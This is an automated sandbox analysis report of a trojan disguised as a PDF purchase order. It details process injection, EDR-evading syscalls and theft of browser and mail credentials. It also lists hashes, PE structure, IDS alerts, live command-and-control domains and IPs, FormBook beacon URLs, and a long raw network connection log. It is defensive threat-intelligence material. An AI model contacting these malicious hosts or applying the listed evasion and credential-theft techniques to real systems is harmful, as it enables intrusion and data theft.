                powershell.exe: Loading BitLocker PowerShell Module; started conhost.exe
                New PO [FK4-7173].pdf.exe (second instance): Maps a DLL or memory area into another process; injected MKVNVRSuoK.exe
                MKVNVRSuoK.exe: Found direct / indirect Syscall (likely to bypass EDR); started shutdown.exe
                shutdown.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures; injected MKVNVRSuoK.exe; started firefox.exe
                MKVNVRSuoK.exe (injected by shutdown.exe): Found direct / indirect Syscall (likely to bypass EDR); DNS/IP: www.maviro.xyz 67.223.117.142, 50010, 50011, 50012 VIMRO-AS15189US United States; www.jllllbx.top 156.234.28.94, 50034, 50035, 50036 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles; 10 other IPs or domains

                Source | Detection | Scanner | Label | Link
                New PO [FK4-7173].pdf.exe | 53% | ReversingLabs | Win32.Trojan.Generic |
                New PO [FK4-7173].pdf.exe | 33% | Virustotal | | Browse
                New PO [FK4-7173].pdf.exe | 100% | Avira | HEUR/AGEN.1309789 |
                New PO [FK4-7173].pdf.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                estrela-b.online | 0% | Virustotal | | Browse
                t95yd.top | 0% | Virustotal | | Browse
                www.tubetrexhd.buzz | 1% | Virustotal | | Browse
                7fh27o.vip | 2% | Virustotal | | Browse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1552610
Start date and time: 2024-11-09 05:34:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: New PO [FK4-7173].pdf.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@10/7@16/12
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 219
• Number of non-executed functions: 242
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
23:34:54 | API Interceptor | 1x Sleep call for process: New PO [FK4-7173].pdf.exe modified
23:34:56 | API Interceptor | 11x Sleep call for process: powershell.exe modified
23:35:51 | API Interceptor | 11167663x Sleep call for process: shutdown.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        217.160.0.220mm.exeGet hashmaliciousUnknownBrowse
                                                                        • www.eyecatch.pro/ai53/
                                                                        STATEMENT.exeGet hashmaliciousFormBookBrowse
                                                                        • www.votelaura.info/s5cm/?7nwhw=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3Y5abrTYjVk&ML=EZBXFN7pQ8l
                                                                        CONTRACT SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                        • www.votelaura.info/s5cm/?IBZlYbB=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&7no=4hLljrWPCjYL
                                                                        P.O #RFQ7787HG00.exeGet hashmaliciousFormBookBrowse
                                                                        • www.votelaura.info/s5cm/?rDHxb=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&Wr=JhnHMfqPY
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                        No context
                                                                        No context
                                                                        Process:C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1172
                                                                        Entropy (8bit):5.358104835552657
                                                                        Encrypted:false
                                                                        SSDEEP:24:35BWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:vWSU4xympjms4RIoU99tK8NDv
                                                                        MD5:850BFA55DD2B425B26CDEBD8295FD6E1
                                                                        SHA1:8DA3F5AE1F6F02A68FD4B5205ACBD0A2B5C5408F
                                                                        SHA-256:1E87EA8D6E434195349FBB8C60722C01EE563614AE9C806D4B1BF19296478F90
                                                                        SHA-512:E8635D8170E7B2A04EE86A5D8FD69A61A494C84A26065EAA110B8F495BB689DDC25BAA28CB860CB539B0224F9F3A314965DD2A2A6770B5C6D81BC3D5727BC453
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                        Process:C:\Windows\SysWOW64\shutdown.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
Preview:SQLite format 3
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.948590234967479
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:New PO [FK4-7173].pdf.exe
                                                                        File size:896'000 bytes
                                                                        MD5:f946f99df4c8406ba19b70561c1d53f6
                                                                        SHA1:fdce6ff15295a31ff37c517b90f466e37e272cfd
                                                                        SHA256:bcd2af5fd6fdac5f0bdfcc38acbaa7d941a30cc75004c1f10731d6ad9efa7632
                                                                        SHA512:b7fea932f40954ed577b3c7b65170bad5ec2dc0fbafd051e6c28a49d0ae9a9ebc999081aca0253dc389edb89b7f9e59e2f9add10b190c30b23c4cdc66bb4e073
                                                                        SSDEEP:24576:cBBFvHn4ozNfXSQL+yNbbFSDrDd47DItfVr69ME:6zvHn4ozNSAJEDrDd0DItf4ME
                                                                        TLSH:4415238D3FA9FA32C749577FCC43411545B7C468FA61F36989D8A82A0F7B98DE04A4C2
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.-g....................."........... ........@.. ....................................@................................
                                                                        Icon Hash:13256c6c6c6c6cec
                                                                        Entrypoint:0x4da6ee
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x672DA524 [Fri Nov 8 05:44:04 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xda6a0          0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xdc000          0x2000        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xde000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0xd86f4       0xd8800   e653f60867ba8f38c55a97fc83d24eb6  False     0.9637036753031177   data       7.953409708030674    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xdc000          0x2000        0x2000    691eba4089dec87cd56b3e26d4dd3ed7  False     0.8829345703125      data       7.554103280995115    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xde000          0xc           0x200     f1085b3717c1f554c9fe231a58093d39  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                         Language  Country  ZLIB Complexity
RT_ICON        0xdc0c8  0x1b3f  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                     0.9697491039426523
RT_GROUP_ICON  0xddc18  0x14    data                                                                            1.05
RT_VERSION     0xddc3c  0x30e   data                                                                            0.4373401534526854
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                                               Severity  Source IP    Source Port  Dest IP      Dest Port  Protocol
2024-11-09T05:35:14.821461+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         20.12.23.50  443          192.168.2.5  49709      TCP
2024-11-09T05:35:53.868488+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         20.12.23.50  443          192.168.2.5  49910      TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                        Nov 9, 2024 05:36:39.987808943 CET4999680192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:36:40.783797026 CET4999680192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:36:41.802329063 CET4999780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:36:41.807226896 CET8049997167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:36:41.807348967 CET4999780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:36:41.813235044 CET4999780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:36:41.818007946 CET8049997167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:36:42.494493008 CET8049997167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:36:42.535881042 CET8049997167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:36:42.535967112 CET4999780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:36:42.537173986 CET4999780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:36:42.541914940 CET8049997167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:36:47.575061083 CET4999880192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:47.581188917 CET80499983.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:47.581286907 CET4999880192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:47.595062017 CET4999880192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:47.602293015 CET80499983.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:48.210095882 CET80499983.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:48.210156918 CET4999880192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:49.096280098 CET4999880192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:49.101176023 CET80499983.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:50.115067005 CET4999980192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:50.120162964 CET80499993.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:50.120400906 CET4999980192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:50.129931927 CET4999980192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:50.134802103 CET80499993.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:50.757450104 CET80499993.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:50.757584095 CET4999980192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:51.643215895 CET4999980192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:51.648097038 CET80499993.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:52.662457943 CET5000080192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:52.667383909 CET80500003.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:52.667478085 CET5000080192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:52.679604053 CET5000080192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:52.684484005 CET80500003.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:52.684523106 CET80500003.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:53.296586990 CET80500003.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:53.299459934 CET5000080192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:54.190115929 CET5000080192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:54.195030928 CET80500003.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:55.211081982 CET5000180192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:55.216058969 CET80500013.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:55.221256971 CET5000180192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:55.226936102 CET5000180192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:55.231733084 CET80500013.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:55.861824036 CET80500013.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:55.862715960 CET80500013.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:36:55.865231991 CET5000180192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:55.869116068 CET5000180192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:36:55.874357939 CET80500013.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:37:01.213584900 CET5000280192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:01.218511105 CET8050002162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:01.219156027 CET5000280192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:01.231091976 CET5000280192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:01.235964060 CET8050002162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:01.953357935 CET8050002162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:01.953381062 CET8050002162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:01.955174923 CET5000280192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:02.736932039 CET5000280192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:03.760826111 CET5000380192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:03.765710115 CET8050003162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:03.765891075 CET5000380192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:03.779086113 CET5000380192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:03.783948898 CET8050003162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:04.515614986 CET8050003162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:04.515636921 CET8050003162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:04.515692949 CET5000380192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:05.284488916 CET5000380192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:06.303371906 CET5000480192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:06.308351994 CET8050004162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:06.308429003 CET5000480192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:06.321697950 CET5000480192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:06.326657057 CET8050004162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:06.326802969 CET8050004162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:07.040445089 CET8050004162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:07.040463924 CET8050004162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:07.040582895 CET5000480192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:07.830746889 CET5000480192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:08.850548029 CET5000580192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:08.855622053 CET8050005162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:08.855823994 CET5000580192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:08.902549028 CET5000580192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:08.907464027 CET8050005162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:09.628434896 CET8050005162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:09.783771038 CET5000580192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:14.645901918 CET8050005162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:14.646023035 CET5000580192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:14.670674086 CET5000580192.168.2.5162.241.63.77
                                                                        Nov 9, 2024 05:37:14.675569057 CET8050005162.241.63.77192.168.2.5
                                                                        Nov 9, 2024 05:37:19.697737932 CET5000680192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:19.702577114 CET8050006167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:19.702718973 CET5000680192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:19.713305950 CET5000680192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:19.718076944 CET8050006167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:20.370877981 CET8050006167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:20.409691095 CET8050006167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:20.409744978 CET5000680192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:21.221318960 CET5000680192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:22.239842892 CET5000780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:22.244740963 CET8050007167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:22.244827032 CET5000780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:22.253962040 CET5000780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:22.258765936 CET8050007167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:22.935378075 CET8050007167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:22.971637011 CET8050007167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:22.971704006 CET5000780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:23.771109104 CET5000780192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:24.787442923 CET5000880192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:24.792321920 CET8050008167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:24.792392969 CET5000880192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:24.804192066 CET5000880192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:24.810193062 CET8050008167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:24.811027050 CET8050008167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:25.463197947 CET8050008167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:25.502604008 CET8050008167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:25.502784014 CET5000880192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:26.315085888 CET5000880192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:27.335113049 CET5000980192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:27.340022087 CET8050009167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:27.347114086 CET5000980192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:27.351109028 CET5000980192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:27.355933905 CET8050009167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:28.015291929 CET8050009167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:28.054352999 CET8050009167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:28.054769039 CET5000980192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:28.059106112 CET5000980192.168.2.5167.172.133.32
                                                                        Nov 9, 2024 05:37:28.063961983 CET8050009167.172.133.32192.168.2.5
                                                                        Nov 9, 2024 05:37:33.109740019 CET5001080192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:33.114514112 CET805001067.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:33.114579916 CET5001080192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:33.124536037 CET5001080192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:33.129349947 CET805001067.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:33.830866098 CET805001067.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:33.868769884 CET805001067.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:33.871193886 CET5001080192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:34.627584934 CET5001080192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:35.646116018 CET5001180192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:35.651068926 CET805001167.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:35.651181936 CET5001180192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:35.661485910 CET5001180192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:35.666295052 CET805001167.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:36.365564108 CET805001167.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:36.403556108 CET805001167.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:36.403614998 CET5001180192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:37.174443007 CET5001180192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:38.243285894 CET5001280192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:38.248217106 CET805001267.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:38.248294115 CET5001280192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:38.380681992 CET5001280192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:38.385631084 CET805001267.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:38.385715961 CET805001267.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:38.960654020 CET805001267.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:38.998831987 CET805001267.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:38.998888016 CET5001280192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:39.908832073 CET5001280192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:40.929775953 CET5001380192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:40.934827089 CET805001367.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:40.934906960 CET5001380192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:40.945723057 CET5001380192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:40.950536013 CET805001367.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:41.648132086 CET805001367.223.117.142192.168.2.5
